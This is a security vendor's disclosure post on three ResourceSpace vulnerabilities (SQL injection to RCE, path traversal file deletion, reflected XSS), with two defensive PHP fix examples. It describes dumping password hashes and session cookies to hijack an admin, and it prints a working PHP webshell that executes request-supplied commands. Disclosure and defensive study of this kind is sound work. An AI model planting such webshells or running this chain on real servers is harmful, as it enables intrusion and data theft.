A few months ago, while scanning the external attack surface of one of our clients, our autonomous pentesting product NodeZero identified an instance of an application called ResourceSpace exposed to the Internet. ResourceSpace is a digital asset management tool that enables users to organize their digital assets. We thought it was interesting that no vulnerabilities had been publicly disclosed against the product since 2015. So we decided to pull down the latest source code to take a closer look.

During our assessment of the ResourceSpace code base, we found three new vulnerabilities that could be exploited by an unauthenticated attacker. The most critical is CVE-2021-41765, a pre-auth SQL injection that an attacker can abuse to gain remote code execution (RCE) privileges on the ResourceSpace server. The other two vulnerabilities identified were CVE-2021-41950, a path traversal vulnerability that can be used to delete arbitrary files on the file system, and CVE-2021-41951, a reflected cross-site scripting (XSS) vulnerability. All three vulnerabilities were promptly patched by the vendor, Montala Limited.

CVE-2021-41765: Unauthenticated SQLi to RCE Chain

ResourceSpace is an older-generation PHP application in which many of the core functions and libraries used for input sanitization were built from scratch. SQL queries are built using string concatenation, and to prevent SQL injection, certain functions like escape_check and getvalescaped are used extensively throughout the code base to sanitize input variables. It requires discipline on the part of developers to consistently apply these sanitization functions.

ResourceSpace 9.5 was released in March 2021, and one of the new features announced as part of that release was “external upload shares.” This feature makes it possible for users without ResourceSpace accounts to upload content to ResourceSpace. To implement this feature, changes were made to the authentication and authorization logic. Those changes inadvertently introduced this vulnerability: we found one instance where an input parameter was not being sanitized. This is parameter k in the file pages/edit_fields/9_ajax/add_keyword.php:

Parameter k represents an authorization key for an external share, and its value is passed to the check_access_key_collection function in include/user_functions.php. Along with k, an identifier for the external share, upload_collection, is also passed into the check_access_key_collection function. Upon further inspection, it turns out that the value of upload_collection can be passed in from a cookie called upload_share_active, and the value of 1 can always be used for this share even if no external shares have been set up by the ResourceSpace admin.

The function check_access_key_collection takes in the value of k as the $key variable and directly sends it to a SQL query, resulting in the SQL injection vulnerability.
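The difference between a concatenated key check and a parameterized one, as an added example that is not ResourceSpace's code or the vendor's fix. The table, columns and function names are hypothetical, and an in-memory SQLite database stands in for the real one so the script runs offline.

```php
<?php
// Added example. Table, column and function names are hypothetical,
// not ResourceSpace's schema or code. Needs the pdo_sqlite extension.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE share_keys (collection INTEGER, access_key TEXT)');
$db->exec("INSERT INTO share_keys VALUES (1, 'constructed-valid-key')");

// Before: the key is pasted into the SQL text, so a quote in the input
// ends the string literal and the rest is parsed as SQL.
function key_valid_concat(PDO $db, string $collection, string $key): bool
{
    $sql = "SELECT COUNT(*) FROM share_keys
            WHERE collection = '$collection' AND access_key = '$key'";
    return (int) $db->query($sql)->fetchColumn() > 0;
}

// After: the statement text is fixed; both values travel as bound data.
// The collection id is also forced to an integer because, as on the page,
// it can arrive from a client-controlled cookie.
function key_valid_bound(PDO $db, string $collection, string $key): bool
{
    if (!ctype_digit($collection)) {
        return false;
    }
    $stmt = $db->prepare('SELECT COUNT(*) FROM share_keys
                          WHERE collection = :c AND access_key = :k');
    $stmt->bindValue(':c', (int) $collection, PDO::PARAM_INT);
    $stmt->bindValue(':k', $key, PDO::PARAM_STR);
    $stmt->execute();
    return (int) $stmt->fetchColumn() > 0;
}

// Constructed inputs: a valid key, a wrong key, and a key containing a quote.
$samples = ['constructed-valid-key', 'wrong-key', "x' OR '1'='1"];
foreach ($samples as $key) {
    printf("%-24s concat=%-5s bound=%s\n",
        $key,
        var_export(key_valid_concat($db, '1', $key), true),
        var_export(key_valid_bound($db, '1', $key), true));
}
```

With bound parameters the check no longer depends on every call site remembering to apply an escaping function.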

We used sqlmap to confirm the SQL injection in a local test environment. sqlmap confirmed the injection as a boolean-based blind SQL injection.

From SQLi to Admin Access

The unauthenticated SQL injection allows an attacker to dump the entire contents of the ResourceSpace database. We found that this data includes users’ session cookies, which are stored in the session column in the user table. If the admin’s session cookie is in the database, an attacker can abuse the SQL injection to get access as an admin user.

Using sqlmap to dump all usernames, password hashes, and session cookies:

Once the session cookie was captured we were able to set the stolen session cookie in the web browser to access the ResourceSpace home page:

From Admin Access to RCE

It is very common for admin access to a web application to result in remote code execution privileges on the underlying server. We’ve described this phenomenon in several previous posts:

In the case of ResourceSpace, we found that an admin could upload a plugin containing arbitrary PHP files to the server, and then execute those PHP files.

The process for creating a plugin is described here. A plugin is a tar.gz file renamed to have the .rsp extension. We dropped in a basic webshell as part of the plugin archive file:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Then uploaded it to the server and accessed it to dump the contents of the /etc/passwd file:

CVE-2021-41950: Path Traversal Leading to Arbitrary File Deletion

CVE-2021-41950 is a path traversal vulnerability in pages/ajax/tiles.php. The vulnerable code is here:

The provider and variant parameters are unsanitized, and they are used to construct a directory path $tilecache. If a file already exists at this directory path, it’s deleted. An unauthenticated attacker can therefore manipulate the provider and variant parameters to arbitrarily delete files as the web server user, including application source code and the ResourceSpace configuration file config.php. Deleting config.php is particularly concerning because it contains multiple application-specific secret keys, making the installation hard to recover unless it was recently backed up.
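One way to constrain a cache path built from request parameters before anything is deleted, as an added example rather than the vendor's patch. The function name, cache layout and sample values are hypothetical.

```php
<?php
// Added example. The function name, cache layout and sample values are
// hypothetical; this is not the vendor's patch.
function tile_cache_path(string $cacheRoot, string $provider, string $variant): ?string
{
    // 1. Allowlist each component: no dots, slashes, NUL bytes or empties.
    foreach ([$provider, $variant] as $part) {
        if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $part) !== 1) {
            return null;
        }
    }
    // 2. Canonicalise the root once so later comparisons are reliable.
    $root = realpath($cacheRoot);
    if ($root === false) {
        return null;
    }
    $candidate = $root . DIRECTORY_SEPARATOR . $provider . DIRECTORY_SEPARATOR . $variant;

    // 3. If something already exists there, resolve symlinks and require
    //    that the real location is still under the cache root.
    $resolved = realpath($candidate);
    $prefix = $root . DIRECTORY_SEPARATOR;
    if ($resolved !== false && strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed demo: a throwaway cache root with one stale entry in it.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tilecache_' . bin2hex(random_bytes(4));
mkdir($root . DIRECTORY_SEPARATOR . 'osm', 0700, true);
file_put_contents($root . '/osm/default', 'stale');

$requests = [['osm', 'default'], ['osm', '../../config.php'], ['..', 'include']];
foreach ($requests as [$provider, $variant]) {
    $path = tile_cache_path($root, $provider, $variant);
    if ($path === null) {
        echo "rejected: provider=$provider variant=$variant\n";
        continue;
    }
    // Only a validated path ever reaches the delete call.
    if (is_file($path)) {
        unlink($path);
    }
    echo "ok: $path\n";
}
rmdir($root . DIRECTORY_SEPARATOR . 'osm');
rmdir($root);
```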

Here’s a curl command that exploits this vulnerability to delete the config.php file:

And the resulting denial of service impact:

CVE-2021-41951: Reflected XSS

CVE-2021-41951 is a reflected XSS vulnerability via the wordpress_user parameter in the file plugins/wordpress_sso/pages/index.php. The value of this parameter is echo’d back to the caller. This appears to be test code left behind in the install.

Proving the XSS:

To exploit this vulnerability, an attacker would need to convince a ResourceSpace user to click on a crafted link. If successful, an attacker can then run arbitrary code in the victim’s browser.

Mitigation

All reported vulnerabilities were promptly fixed by the vendor, Montala Limited. In addition to fixing the above vulnerabilities, the vendor also removed the ability for administrators to upload custom plugins through the web interface.

The critical pre-auth SQL injection vulnerability affects ResourceSpace version 9.5 through 9.6.18229. If you are on any of these versions, it is highly recommended that you update to the latest version of ResourceSpace.

The latest version of ResourceSpace as of this writing is 9.7, released on October 29, 2021.

Timeline

  • Sept. 25, 2021: Vulnerabilities disclosed to vendor

  • Sept. 27, 2021: All vulnerabilities fixed

  • Nov. 9, 2021: Public disclosure
